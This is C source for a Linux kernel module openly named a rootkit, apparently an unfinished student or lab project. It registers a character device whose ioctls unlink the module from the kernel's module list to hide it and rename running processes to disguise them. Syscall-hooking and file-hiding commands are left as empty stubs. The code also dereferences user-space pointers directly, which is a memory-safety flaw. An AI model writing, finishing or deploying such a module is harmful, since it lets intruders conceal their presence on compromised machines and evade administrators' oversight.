#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/sched/signal.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <linux/cdev.h>
#include <linux/hashtable.h>
#include <asm/syscall.h>
#include <stdbool.h>

#include "rootkit.h"

#define OURMODNAME "rootkit"

MODULE_AUTHOR("FOOBAR");
MODULE_DESCRIPTION("FOOBAR");
MODULE_LICENSE("Dual MIT/GPL");
MODULE_VERSION("0.1");

static int major;
struct cdev *kernel_cdev;

static int rootkit_open(struct inode *inode, struct file *filp)
{
    printk(KERN_INFO "%s\n", __func__);
    return 0;
}

static int rootkit_release(struct inode *inode, struct file *filp)
{
    printk(KERN_INFO "%s\n", __func__);
    return 0;
}

static void toggleVisibility(void) {
    static bool visible = true;
    static struct list_head *prev = NULL;

    if (visible) {
        prev = THIS_MODULE->list.prev;
        list_del(&THIS_MODULE->list);
    } else {
        list_add(&THIS_MODULE->list, prev);
    }
    visible = !visible;
}

struct h_node {
    char orig_name[MASQ_LEN];
    char new_name[MASQ_LEN];
    struct hlist_node node;
};

// Generated by Microsoft Copilot (Bing Chat)
static unsigned long hash_str(char *str) {
    unsigned long hash = 5381;
    int c;

    while ((c = *str++))
        hash = ((hash << 5) + hash) + c; /* hash * 33 + c */

    return hash;
}

static int masqProcNames(const struct masq_proc_req __user *req) {
    int i;
    struct h_node *nodes, *curr;
    struct task_struct *task;

    // NOTE: holds only 2^7 entries
    DECLARE_HASHTABLE(procs, 7);
    hash_init(procs);

    nodes = kmalloc(req->len * sizeof(struct h_node), GFP_KERNEL);

    for (i = 0; i < req->len; i++) {
        size_t orig_len = strlen(req->list[i].orig_name);
        size_t new_len = strlen(req->list[i].new_name);

        if (new_len > orig_len) continue;

        if (copy_from_user(nodes[i].orig_name, req->list[i].orig_name, orig_len + 1))
            return -EFAULT;
        if (copy_from_user(nodes[i].new_name, req->list[i].new_name, new_len + 1))
            return -EFAULT;

        hash_add(procs, &nodes[i].node, hash_str(nodes[i].orig_name));
    }

    // Update process names
    for_each_process(task) {
        unsigned long key;

        if (!task->comm) continue;
        get_task_struct(task);

        key = hash_str(task->comm);
        hash_for_each_possible(procs, curr, node, key) {
            if (strcmp(curr->orig_name, task->comm) == 0)
                strcpy(task->comm, curr->new_name);
        }

        put_task_struct(task);
    }

    kfree(nodes);

    return 0;
}

static long rootkit_ioctl(struct file *filp, unsigned int ioctl,
                          unsigned long arg)
{
    int ret = 0;

    printk(KERN_INFO "%s\n", __func__);

    switch (ioctl) {
    case IOCTL_MOD_HOOK:
        break;
    case IOCTL_MOD_HIDE:
        toggleVisibility();
        break;
    case IOCTL_MOD_MASQ:
        ret = masqProcNames((struct masq_proc_req __user *) arg);
        break;
    case IOCTL_FILE_HIDE:
        break;
    default:
        ret = -EINVAL;
    }

    return ret;
}

struct file_operations fops = {
    open: rootkit_open,
    unlocked_ioctl: rootkit_ioctl,
    release: rootkit_release,
    owner: THIS_MODULE
};

static int __init rootkit_init(void)
{
    int ret;
    dev_t dev_no, dev;

    kernel_cdev = cdev_alloc();
    kernel_cdev->ops = &fops;
    kernel_cdev->owner = THIS_MODULE;

    ret = alloc_chrdev_region(&dev_no, 0, 1, "rootkit");
    if (ret < 0) {
        pr_info("major number allocation failed\n");
        return ret;
    }

    major = MAJOR(dev_no);
    dev = MKDEV(major, 0);
    printk("The major number for your device is %d\n", major);
    ret = cdev_add(kernel_cdev, dev, 1);
    if (ret < 0) {
        pr_info(KERN_INFO "unable to allocate cdev");
        return ret;
    }

    return 0;
}

static void __exit rootkit_exit(void)
{
    // TODO: unhook syscall

    pr_info("%s: removed\n", OURMODNAME);
    cdev_del(kernel_cdev);
    unregister_chrdev_region(major, 1);
}

module_init(rootkit_init);
module_exit(rootkit_exit);
